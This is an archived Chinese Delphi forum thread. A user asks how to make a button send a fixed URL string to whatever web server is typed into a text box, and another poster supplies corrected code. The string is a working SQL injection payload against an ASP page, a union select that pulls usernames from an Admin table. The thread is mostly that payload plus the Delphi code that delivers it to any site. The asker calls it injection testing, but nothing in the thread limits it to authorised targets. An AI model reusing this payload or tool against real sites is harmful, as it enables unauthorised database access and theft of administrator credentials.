http://www.delphi2007.net/DelphiNetwork/html/delphi_20061202200134214.html
实现:点了button以后发送 edit1.text + '后面的一串' 到web服务器
后面一串如下:
/Region.asp?Country=tt&City=fucka&Province=bug' and 1=2 union select username from Admin where 1<2 and '1'='1
我的代码
procedure TForm1.Button2Click(Sender: TObject);
begin
self.WebBrowser1.Navigate(edit1.Text+'/Region.asp?Country=tt&City=fucka&Province=bug''+'and'+'1=2'+'union'+'select'+'username'+'from'+'Admin'+'where'+'1'+'<'+'2'+'and'+'1'='1);
end;
提示有错误:Missing operator or semicolon
望朋友指点
如果你的URL就是那样的(我没有看出提交给ASP的那些字串是什么意思),那么,可以按下面这样:
var s:string;
begin
s:=s+'/Region.asp?Country=tt&City=fucka&Province=bug';
s:=s+quotedstr(' and 1=2 union select username from Admin where 1<2 and ');
s:=s+'1';
s:=s+quotedstr('=');
s:=s+'1';
WebBrowser1.Navigate(edit1.Text+s);
end;
多谢指点,这个字符串是测试注入的